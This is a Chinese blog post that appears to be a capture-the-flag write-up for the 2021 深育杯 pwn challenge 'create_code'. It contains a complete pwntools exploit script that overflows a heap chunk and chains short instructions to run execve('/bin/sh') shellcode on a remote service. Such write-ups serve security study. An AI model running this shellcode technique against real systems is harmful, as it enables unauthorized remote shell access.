2021 深育杯 pwn create_code

最新推荐文章于 2022-07-03 16:56:29 发布
最新推荐文章于 2022-07-03 16:56:29 发布
阅读量231 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/121644913
版权

在这里插入图片描述

保护没有开NX,能执行shellcode。

在这里插入图片描述malloc中可以执行一段shellcode。
但是字节大小不能大于15

我们一定是需要输入正常的shellcode的。
因为我们其实可以看的到有溢出,可以想办法在堆里布置好shellcode,然后在一个chunk中通过一些符合条件但没什么用的代码走下去,走到我们shellcode。

然后我们试图去找合适的汇编代码。
http://ref.x86asm.net/coder64.html#x0F48

在这里插入图片描述
利用起来。

# -*- coding: utf-8 -*-
from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

local = 0
if local:
    r = process('./create_code')

else:
    r = remote("192.168.37.130",2007)

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()

src = '''
    b *$rebase(0x1507)
    c
'''

def debug():
    gdb.attach(r, src)
    pause()
    
def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

def create(content):
    sla("> ", "1")
    sa("content: ", content)

def dele(index):
    sla("> ", "3")
    sla("id: ", str(index))

shellcode = '''
        push 0x68
        mov rax, 0x68732f6e69622f
        push rax
        mov rdi, rsp
        xor esi, esi /* 0 */
        xor edx, edx /* 0 */
        /* call execve() */
        push 59 /* 0x3b */
        pop rax
        syscall
'''

payload = 'a' * 0xb8 + (p8(0xd) + p32(0x01010101)) + asm(shellcode)
create("aaaa")
create(payload)

dele(0)

#debug()
payload = p32(0xf012f012) + (p8(0xd) + p32(0x01010101)) * (0x3e8 / 5)
create(payload)

ti()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-PWN练习之函数指针改写
ChuMeng1999的博客
01-05 482
目录预备知识一、相关实验二、objdump使用三、函数指针实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF-PWN练习》以及《CTF-PWN练习之精确覆盖变量数据》。 二、objdump使用 使用objdump工具可以查看一个目标文件的许多内部信息,objdump有许多可选的参数选项,通过控制这些参数选项可以输出不同的文件信息。 本实验中,在对二进制程序进行分析时,我们可以使用objdump获取二进制程序中
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 568
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
强网杯 WriteUp By Nu1L源代码程序.pdf
12-18
强网杯
ctf pwn出题和搭建环境
九层台
10-11 6833
学校要举办校赛,需要出pwn题目和搭建环境。遇到了几个坑在这里填一下。 然后感谢一纸笔墨大佬的帮忙。 出题 出题遇到了一个问题在程序运行的时候输入和输出的顺序是反的。 $ ./pwn1 If you can get the shell, you will be out good luck!! 这个是正常运行 用这个命令部署 $ socat tcp-l:8887,fork exec:./pwn...
CTF中的AEG(七) 对aeg题目源码分析 华为云专场-pwn_game
yongbaoii的博客
04-18 513
想起来就发点
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
Title CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /home/ctf/flag Hint 计算器本身功能完善了吗? 关注协议本身 backdoor了解一下 Attachment calc.rar Tool IDA, pwntools Tag backdoor
PWN测试题目
07-18
信息安全PWN测试题目:用于CTF的练习与PWN的学习,测试题目。
PWN-Challenges
03-17
PWN挑战 在这里,我要添加一些我完成的CTF的PWN挑战文章...。
漏洞利用:Pwn的东西
02-20
漏洞利用 我的一些pwn漏洞: 使用针对PHP 7.0-7.4的PHP disable_functions旁路。 对于版本7.0-7.3,使用 PHP disable_functions旁路。 错误在PHP 7.4中修复。 在30.05.2019之前发布的版本7.1-7.3中使用PHP disable_functions旁路。
SCTF2021 pwn Christmas Wishes 出题思路+预期解
令则
01-19 1924
SCTF2021 pwn Christmas Wishes 出题思路+预期解
SCTF2021 pwn gadget 出题思路+预期非预期解
令则
01-19 974
SCTF2021 pwn gadget 出题思路+预期非预期解
ACTF出题(dropper+master_of_dns)
qq_36386435的博客
07-03 2144
ACTF2022出题(dropper+master_of_dns)
pwn学习总结
Ree的整理与收集
09-01 5757
遇到的优秀文章 关于Heap Overflow(堆溢出) Linux常见漏洞利用技术实践 GCC 中的编译器堆栈保护技术 Linux环境进程间通信(一) 现代Linux操作系统的栈溢出(一) 解读Linux安全机制之栈溢出保护工具与常用命令*nix命令 export ...="..." 添加一个环境变量,这个环境变量只在这个shell进程中起作用 gdbgdb的话一定会装peda插件。p
南邮 逆向 pwn 题解 (持续更新中)
qq_41071646的博客
03-14 1716
第一题 就不用说了 。。 直接出答案。。 第二题 就比较好玩了 其实 也能够 明白出题人的用心良苦 现在很多人 都不愿意 好好的学习汇编 包括 有一部分 同学还有学弟们 一直问我 汇编有没有用 我一直都和他们说 当你问 一个东西有没有必要学的时候 你自己内心就已经有了答案 然后 我们来看这个题 题的代码我都提取出来了 让大家看一下 int mai...
2023 羊城杯 pwn
最新发布
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值